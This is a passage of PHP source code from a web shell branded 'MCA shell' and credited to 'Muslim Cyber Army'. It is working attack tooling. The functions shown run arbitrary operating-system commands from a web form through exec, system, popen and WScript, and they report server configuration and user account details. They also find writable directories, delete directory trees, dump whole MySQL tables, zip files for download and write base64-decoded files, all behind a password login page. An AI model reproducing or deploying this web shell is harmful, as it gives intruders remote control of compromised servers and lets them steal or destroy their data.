1430 formhead(array('title' => 'Execute Command'));
1431 makehide('action', 'shell');
1432 if (IS_WIN && IS_COM) {
1433 $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1434 makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1435 }
1436 p('<p>');
1437 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1438 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1439 p('</p>');
1440 formfoot();
1441 if ($command) {
1442 p('<hr width="100%" noshade /><pre>');
1443 if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
1444 $wsh = new COM('WScript.shell');
1445 $exec = $wsh->exec('cmd.exe /c ' . $command);
1446 $stdout = $exec->StdOut();
1447 $stroutput = $stdout->ReadAll();
1448 echo $stroutput;
1449 } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
1450 $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1451 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1452 if (is_resource($process)) {
1453 fwrite($pipes[0], $command . "\r\n");
1454 fwrite($pipes[0], "exit\r\n");
1455 fclose($pipes[0]);
1456 while (!feof($pipes[1])) {
1457 echo fgets($pipes[1], 1024);
1458 }
1459 fclose($pipes[1]);
1460 while (!feof($pipes[2])) {
1461 echo fgets($pipes[2], 1024);
1462 }
1463 fclose($pipes[2]);
1464 proc_close($process);
1465 }
1466 } else {
1467 echo (execute($command));
1468 }
1469 p('</pre>');
1470 }
1471} //end shell
1472elseif ($action == 'phpenv') {
1473 $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1474 $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1475 !$dis_func && $dis_func = 'No';
1476 $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1477 if ($phpvarname) {
1478 m($phpvarname . ' : ' . getcfg($phpvarname));
1479 }
1480 formhead(array('title' => 'Server environment'));
1481 makehide('action', 'phpenv');
1482 makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1483 formfooter();
1484 $hp = array(0 => 'Server', 1 => 'PHP');
1485 for ($a = 0;$a < 2;$a++) {
1486 p('<h2>' . $hp[$a] . ' »</h2>');
1487 p('<ul class="info">');
1488 if ($a == 0) {
1489 for ($i = 1;$i <= 9;$i++) {
1490 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1491 }
1492 } elseif ($a == 1) {
1493 for ($i = 10;$i <= 23;$i++) {
1494 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1495 }
1496 }
1497 p('</ul>');
1498 }
1499} //end phpenv
1500else {
1501 m('Undefined Action');
1502}
1503?>
1504
1505</td></tr></table>
1506<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1507 <span style="float:right;"><?php debuginfo();
1508ob_end_flush(); ?></span>
1509 Copyright (C) 2013 <B></B> - Develop by <a href=http://google.com target=_blank><B>BillGate </B></a> - <B>- Muslim Cyber Army</B> All Rights Reserved.
1510</div>
1511</body>
1512</noscript>
1513
1514<?php
1515/*======================================================
1516Show info shell
1517======================================================*/
1518function m($msg) {
1519 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1520 echo $msg;
1521 echo '</div>';
1522}
1523function scookie($key, $value, $life = 0, $prefix = 1) {
1524 global $admin, $timestamp, $_SERVER;
1525 $key = ($prefix ? $admin['cookiepre'] : '') . $key;
1526 $life = $life ? $life : $admin['cookielife'];
1527 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1528 setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1529}
1530function multi($num, $perpage, $curpage, $tablename) {
1531 $multipage = '';
1532 if ($num > $perpage) {
1533 $page = 10;
1534 $offset = 5;
1535 $pages = @ceil($num / $perpage);
1536 if ($page > $pages) {
1537 $from = 1;
1538 $to = $pages;
1539 } else {
1540 $from = $curpage - $offset;
1541 $to = $curpage + $page - $offset - 1;
1542 if ($from < 1) {
1543 $to = $curpage + 1 - $from;
1544 $from = 1;
1545 if (($to - $from) < $page && ($to - $from) < $pages) {
1546 $to = $page;
1547 }
1548 } elseif ($to > $pages) {
1549 $from = $curpage - $pages + $to;
1550 $to = $pages;
1551 if (($to - $from) < $page && ($to - $from) < $pages) {
1552 $from = $pages - $page + 1;
1553 }
1554 }
1555 }
1556 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
1557 for ($i = $from;$i <= $to;$i++) {
1558 $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
1559 }
1560 $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
1561 $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
1562 }
1563 return $multipage;
1564}
1565// Login page
1566function loginpage() {
1567?>
1568
1569<html>
1570<head>
1571
1572<body bgcolor=black background=1.jpg>
1573
1574 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1575<title>.::[ MCA shell ]::. </title>
1576<style type="text/css">
1577A:link {text-decoration: none; color: green }
1578A:visited {text-decoration: none;color:red}
1579A:active {text-decoration: none}
1580A:hover {text-decoration: underline; color: green;}
1581input, textarea, button
1582{
1583 font-size: 11pt;
1584 color: #FFFFFF;
1585 font-family: verdana, sans-serif;
1586 background-color: #000000;
1587 border-left: 2px dashed #8B0000;
1588 border-top: 2px dashed #8B0000;
1589 border-right: 2px dashed #8B0000;
1590 border-bottom: 2px dashed #8B0000;
1591}
1592
1593</style>
1594
1595 <BR><BR>
1596<div align=center >
1597
1598<div>
1599
1600<font color=gray>
1601<br /><br /><br /><br /><br />
1602
1603<form method="POST" action="">
1604 <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
1605 <input type="hidden" name="doing" value="login">
1606 <input type="submit" value="Login">
1607 </form>
1608<BR>
1609<?php
1610 echo "" . $err_mess . "";
1611?>
1612
1613 <B><font color=red>
1614
1615
1616
1617
1618
1619
1620</div>
1621
1622
1623 </fieldset>
1624
1625
1626
1627</head>
1628</html>
1629
1630<?php
1631 exit;
1632} //end loginpage()
1633function execute($cfe) {
1634 $res = '';
1635 if ($cfe) {
1636 if (function_exists('exec')) {
1637 @exec($cfe, $res);
1638 $res = join("\n", $res);
1639 } elseif (function_exists('shell_exec')) {
1640 $res = @shell_exec($cfe);
1641 } elseif (function_exists('system')) {
1642 @ob_start();
1643 @system($cfe);
1644 $res = @ob_get_contents();
1645 @ob_end_clean();
1646 } elseif (function_exists('passthru')) {
1647 @ob_start();
1648 @passthru($cfe);
1649 $res = @ob_get_contents();
1650 @ob_end_clean();
1651 } elseif (@is_resource($f = @popen($cfe, "r"))) {
1652 $res = '';
1653 while (!@feof($f)) {
1654 $res.= @fread($f, 1024);
1655 }
1656 @pclose($f);
1657 }
1658 }
1659 return $res;
1660}
1661function which($pr) {
1662 $path = execute("which $pr");
1663 return ($path ? $path : $pr);
1664}
1665function cf($fname, $text) {
1666 if ($fp = @fopen($fname, 'w')) {
1667 @fputs($fp, base64_decode($text));
1668 @fclose($fp);
1669 }
1670}
1671// Debug
1672function debuginfo() {
1673 global $starttime;
1674 $mtime = explode(' ', microtime());
1675 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1676 echo 'Processed in ' . $totaltime . ' second(s)';
1677}
1678// Function connect database
1679function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
1680 if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
1681 p('<h2>Can not connect to MySQL server</h2>');
1682 exit;
1683 }
1684 if ($link && $dbname) {
1685 if (!@mysql_select_db($dbname, $link)) {
1686 p('<h2>Database selected has error</h2>');
1687 exit;
1688 }
1689 }
1690 if ($link && mysql_get_server_info() > '4.1') {
1691 if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1692 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1693 }
1694 }
1695 return $link;
1696}
1697// Array strip
1698function s_array(&$array) {
1699 if (is_array($array)) {
1700 foreach ($array as $k => $v) {
1701 $array[$k] = s_array($v);
1702 }
1703 } else if (is_string($array)) {
1704 $array = stripslashes($array);
1705 }
1706 return $array;
1707}
1708// HTML Strip
1709function html_clean($content) {
1710 $content = htmlspecialchars($content);
1711 $content = str_replace("\n", "<br />", $content);
1712 $content = str_replace(" ", " ", $content);
1713 $content = str_replace("\t", " ", $content);
1714 return $content;
1715}
1716// Chmod
1717function getChmod($filepath) {
1718 return substr(base_convert(@fileperms($filepath), 10, 8), -4);
1719}
1720function getPerms($filepath) {
1721 $mode = @fileperms($filepath);
1722 if (($mode & 0xC000) === 0xC000) {
1723 $type = 's';
1724 } elseif (($mode & 0x4000) === 0x4000) {
1725 $type = 'd';
1726 } elseif (($mode & 0xA000) === 0xA000) {
1727 $type = 'l';
1728 } elseif (($mode & 0x8000) === 0x8000) {
1729 $type = '-';
1730 } elseif (($mode & 0x6000) === 0x6000) {
1731 $type = 'b';
1732 } elseif (($mode & 0x2000) === 0x2000) {
1733 $type = 'c';
1734 } elseif (($mode & 0x1000) === 0x1000) {
1735 $type = 'p';
1736 } else {
1737 $type = '?';
1738 }
1739 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1740 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1741 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1742 $group['read'] = ($mode & 00040) ? 'r' : '-';
1743 $group['write'] = ($mode & 00020) ? 'w' : '-';
1744 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1745 $world['read'] = ($mode & 00004) ? 'r' : '-';
1746 $world['write'] = ($mode & 00002) ? 'w' : '-';
1747 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1748 if ($mode & 0x800) {
1749 $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
1750 }
1751 if ($mode & 0x400) {
1752 $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
1753 }
1754 if ($mode & 0x200) {
1755 $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
1756 }
1757 return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute'];
1758}
1759function getUser($filepath) {
1760 if (function_exists('posix_getpwuid')) {
1761 $array = @posix_getpwuid(@fileowner($filepath));
1762 if ($array && is_array($array)) {
1763 return ' / <a href="#" title="User: ' . $array['name'] . '
Passwd: ' . $array['passwd'] . '
Uid: ' . $array['uid'] . '
gid: ' . $array['gid'] . '
Gecos: ' . $array['gecos'] . '
Dir: ' . $array['dir'] . '
Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
1764 }
1765 }
1766 return '';
1767}
1768// Delete dir
1769function deltree($deldir) {
1770 $mydir = @dir($deldir);
1771 while ($file = $mydir->read()) {
1772 if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
1773 @chmod($deldir . '/' . $file, 0777);
1774 deltree($deldir . '/' . $file);
1775 }
1776 if (is_file($deldir . '/' . $file)) {
1777 @chmod($deldir . '/' . $file, 0777);
1778 @unlink($deldir . '/' . $file);
1779 }
1780 }
1781 $mydir->close();
1782 @chmod($deldir, 0777);
1783 return @rmdir($deldir) ? 1 : 0;
1784}
1785// Background
1786function bg() {
1787 global $bgc;
1788 return ($bgc++ % 2 == 0) ? 'alt1' : 'alt2';
1789}
1790// Get path
1791function getPath($scriptpath, $nowpath) {
1792 if ($nowpath == '.') {
1793 $nowpath = $scriptpath;
1794 }
1795 $nowpath = str_replace('\\', '/', $nowpath);
1796 $nowpath = str_replace('//', '/', $nowpath);
1797 if (substr($nowpath, -1) != '/') {
1798 $nowpath = $nowpath . '/';
1799 }
1800 return $nowpath;
1801}
1802// Get up path
1803function getUpPath($nowpath) {
1804 $pathdb = explode('/', $nowpath);
1805 $num = count($pathdb);
1806 if ($num > 2) {
1807 unset($pathdb[$num - 1], $pathdb[$num - 2]);
1808 }
1809 $uppath = implode('/', $pathdb) . '/';
1810 $uppath = str_replace('//', '/', $uppath);
1811 return $uppath;
1812}
1813// Config
1814function getcfg($varname) {
1815 $result = get_cfg_var($varname);
1816 if ($result == 0) {
1817 return 'No';
1818 } elseif ($result == 1) {
1819 return 'Yes';
1820 } else {
1821 return $result;
1822 }
1823}
1824// Function name
1825function getfun($funName) {
1826 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1827}
1828function GetList($dir) {
1829 global $dirdata, $j, $nowpath;
1830 !$j && $j = 1;
1831 if ($dh = opendir($dir)) {
1832 while ($file = readdir($dh)) {
1833 $f = str_replace('//', '/', $dir . '/' . $file);
1834 if ($file != '.' && $file != '..' && is_dir($f)) {
1835 if (is_writable($f)) {
1836 $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
1837 $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
1838 $dirdata[$j]['dirchmod'] = getChmod($f);
1839 $dirdata[$j]['dirperm'] = getPerms($f);
1840 $dirdata[$j]['dirlink'] = ue($dir);
1841 $dirdata[$j]['server_link'] = $f;
1842 $dirdata[$j]['client_link'] = ue($f);
1843 $j++;
1844 }
1845 GetList($f);
1846 }
1847 }
1848 closedir($dh);
1849 clearstatcache();
1850 return $dirdata;
1851 } else {
1852 return array();
1853 }
1854}
1855function qy($sql) {
1856 //echo $sql.'<br>';
1857 $res = $error = '';
1858 if (!$res = @mysql_query($sql)) {
1859 return 0;
1860 } else if (is_resource($res)) {
1861 return 1;
1862 } else {
1863 return 2;
1864 }
1865 return 0;
1866}
1867function q($sql) {
1868 return @mysql_query($sql);
1869}
1870function fr($qy) {
1871 mysql_free_result($qy);
1872}
1873function sizecount($size) {
1874 if ($size > 1073741824) {
1875 $size = round($size / 1073741824 * 100) / 100 . ' G';
1876 } elseif ($size > 1048576) {
1877 $size = round($size / 1048576 * 100) / 100 . ' M';
1878 } elseif ($size > 1024) {
1879 $size = round($size / 1024 * 100) / 100 . ' K';
1880 } else {
1881 $size = $size . ' B';
1882 }
1883 return $size;
1884}
1885// Zip
1886class PHPZip {
1887 var $out = '';
1888 function PHPZip($dir) {
1889 if (@function_exists('gzcompress')) {
1890 $curdir = getcwd();
1891 if (is_array($dir)) $filelist = $dir;
1892 else {
1893 $filelist = $this->GetFileList($dir); //File list
1894 foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
1895 }
1896 if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
1897 else chdir($curdir);
1898 if (count($filelist) > 0) {
1899 foreach ($filelist as $filename) {
1900 if (is_file($filename)) {
1901 $fd = fopen($filename, 'r');
1902 $content = @fread($fd, filesize($filename));
1903 fclose($fd);
1904 if (is_array($dir)) $filename = basename($filename);
1905 $this->addFile($content, $filename);
1906 }
1907 }
1908 $this->out = $this->file();
1909 chdir($curdir);
1910 }
1911 return 1;
1912 } else return 0;
1913 }
1914 // Show file list
1915 function GetFileList($dir) {
1916 static $a;
1917 if (is_dir($dir)) {
1918 if ($dh = opendir($dir)) {
1919 while ($file = readdir($dh)) {
1920 if ($file != '.' && $file != '..') {
1921 $f = $dir . '/' . $file;
1922 if (is_dir($f)) $this->GetFileList($f);
1923 $a[] = $f;
1924 }
1925 }
1926 closedir($dh);
1927 }
1928 }
1929 return $a;
1930 }
1931 var $datasec = array();
1932 var $ctrl_dir = array();
1933 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
1934 var $old_offset = 0;
1935 function unix2DosTime($unixtime = 0) {
1936 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1937 if ($timearray['year'] < 1980) {
1938 $timearray['year'] = 1980;
1939 $timearray['mon'] = 1;
1940 $timearray['mday'] = 1;
1941 $timearray['hours'] = 0;
1942 $timearray['minutes'] = 0;
1943 $timearray['seconds'] = 0;
1944 } // end if
1945 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1946 }
1947 function addFile($data, $name, $time = 0) {
1948 $name = str_replace('\\', '/', $name);
1949 $dtime = dechex($this->unix2DosTime($time));
1950 $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
1951 eval('$hexdtime = "' . $hexdtime . '";');
1952 $fr = "\x50\x4b\x03\x04";
1953 $fr.= "\x14\x00";
1954 $fr.= "\x00\x00";
1955 $fr.= "\x08\x00";
1956 $fr.= $hexdtime;
1957 $unc_len = strlen($data);
1958 $crc = crc32($data);
1959 $zdata = gzcompress($data);
1960 $c_len = strlen($zdata);
1961 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1962 $fr.= pack('V', $crc);
1963 $fr.= pack('V', $c_len);
1964 $fr.= pack('V', $unc_len);
1965 $fr.= pack('v', strlen($name));
1966 $fr.= pack('v', 0);
1967 $fr.= $name;
1968 $fr.= $zdata;
1969 $fr.= pack('V', $crc);
1970 $fr.= pack('V', $c_len);
1971 $fr.= pack('V', $unc_len);
1972 $this->datasec[] = $fr;
1973 $new_offset = strlen(implode('', $this->datasec));
1974 $cdrec = "\x50\x4b\x01\x02";
1975 $cdrec.= "\x00\x00";
1976 $cdrec.= "\x14\x00";
1977 $cdrec.= "\x00\x00";
1978 $cdrec.= "\x08\x00";
1979 $cdrec.= $hexdtime;
1980 $cdrec.= pack('V', $crc);
1981 $cdrec.= pack('V', $c_len);
1982 $cdrec.= pack('V', $unc_len);
1983 $cdrec.= pack('v', strlen($name));
1984 $cdrec.= pack('v', 0);
1985 $cdrec.= pack('v', 0);
1986 $cdrec.= pack('v', 0);
1987 $cdrec.= pack('v', 0);
1988 $cdrec.= pack('V', 32);
1989 $cdrec.= pack('V', $this->old_offset);
1990 $this->old_offset = $new_offset;
1991 $cdrec.= $name;
1992 $this->ctrl_dir[] = $cdrec;
1993 }
1994 function file() {
1995 $data = implode('', $this->datasec);
1996 $ctrldir = implode('', $this->ctrl_dir);
1997 return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
1998 }
1999}
2000// Dump mysql
2001function sqldumptable($table, $fp = 0) {
2002 $tabledump = "DROP TABLE IF EXISTS $table;\n";
2003 $tabledump.= "CREATE TABLE $table (\n";
2004 $firstfield = 1;
2005 $fields = q("SHOW FIELDS FROM $table");
2006 while ($field = mysql_fetch_array($fields)) {
2007 if (!$firstfield) {
2008 $tabledump.= ",\n";
2009 } else {
2010 $firstfield = 0;
2011 }
2012 $tabledump.= " $field[Field] $field[Type]";
2013 if (!empty($field["Default"])) {
2014 $tabledump.= " DEFAULT '$field[Default]'";
2015 }
2016 if ($field['Null'] != "YES") {
2017 $tabledump.= " NOT NULL";
2018 }
2019 if ($field['Extra'] != "") {
2020 $tabledump.= " $field[Extra]";
2021 }
2022 }
2023 fr($fields);
2024 $keys = q("SHOW KEYS FROM $table");
2025 while ($key = mysql_fetch_array($keys)) {
2026 $kname = $key['Key_name'];
2027 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2028 $kname = "UNIQUE|$kname";
2029 }
2030 if (!is_array($index[$kname])) {
2031 $index[$kname] = array();
2032 }
2033 $index[$kname][] = $key['Column_name'];
2034 }
2035 fr($keys);
2036 while (list($kname, $columns) = @each($index)) {
2037 $tabledump.= ",\n";
2038 $colnames = implode($columns, ",");
2039 if ($kname == "PRIMARY") {
2040 $tabledump.= " PRIMARY KEY ($colnames)";
2041 } else {
2042 if (substr($kname, 0, 6) == "UNIQUE") {
2043 $kname = substr($kname, 7);
2044 }
2045 $tabledump.= " KEY $kname ($colnames)";
2046 }
2047 }
2048 $tabledump.= "\n);\n\n";
2049 if ($fp) {
2050 fwrite($fp, $tabledump);
2051 } else {
2052 echo $tabledump;
2053 }
2054 $rows = q("SELECT * FROM $table");
2055 $numfields = mysql_num_fields($rows);
2056 while ($row = mysql_fetch_array($rows)) {
2057 $tabledump = "INSERT INTO $table VALUES(";
2058 $fieldcounter = - 1;
2059 $firstfield = 1;
2060 while (++$fieldcounter < $numfields) {
2061 if (!$firstfield) {
2062 $tabledump.= ", ";
2063 } else {
2064 $firstfield = 0;
2065 }
2066 if (!isset($row[$fieldcounter])) {
2067 $tabledump.= "NULL";
2068 } else {
2069 $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
2070 }
2071 }
2072 $tabledump.= ");\n";
2073 if ($fp) {
2074 fwrite($fp, $tabledump);
2075 } else {
2076 echo $tabledump;
2077 }
2078 }
2079 fr($rows);
2080 if ($fp) {
2081 fwrite($fp, "\n");
2082 } else {
2083 echo "\n";
2084 }
2085}
2086function ue($str) {
2087 return urlencode($str);
2088}
2089function p($str) {
2090 echo $str . "\n";
2091}
2092function tbhead() {
2093 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2094}
2095function tbfoot() {
2096 p('</table>');
2097}
2098function makehide($name, $value = '') {
2099 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2100}
2101function makeinput($arg = array()) {
2102 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2103 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2104 !$arg['type'] && $arg['type'] = 'text';
2105 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2106 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2107 if ($arg['newline']) {
2108 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2109 } else {
2110 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2111 }
2112}
2113function makeselect($arg = array()) {
2114 if ($arg['onchange']) {
2115 $onchange = 'onchange="' . $arg['onchange'] . '"';
2116 }
2117 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2118 if ($arg['newline']) p('<p>');
2119 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2120 if (is_array($arg['option'])) {
2121 foreach ($arg['option'] as $key => $value) {
2122 if ($arg['selected'] == $key) {
2123 p("<option value=\"$key\" selected>$value</option>");
2124 } else {
2125 p("<option value=\"$key\">$value</option>");
2126 }
2127 }
2128 }
2129 p("</select>");
2130 if ($arg['newline']) p('</p>');
2131}
2132function formhead($arg = array()) {
2133 !$arg['method'] && $arg['method'] = 'post';
2134 !$arg['action'] && $arg['action'] = $self;
2135 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2136 !$arg['name'] && $arg['name'] = 'form1';
2137 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2138 if ($arg['title']) {
2139 p('<h2>' . $arg['title'] . ' »</h2>');
2140 }
2141}
2142function maketext($arg = array()) {
2143 !$arg['cols'] && $arg['cols'] = 100;
2144 !$arg['rows'] && $arg['rows'] = 25;
2145 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2146 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2147}
2148function formfooter($name = '') {
2149 !$name && $name = 'submit';
2150 p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
2151 p('</form>');
2152}
2153function formfoot() {
2154 p('</form>');
2155}
2156// Exit
2157function pr($a) {
2158 echo '<pre>';
2159 print_r($a);
2160 echo '</pre>';
2161}
2162?>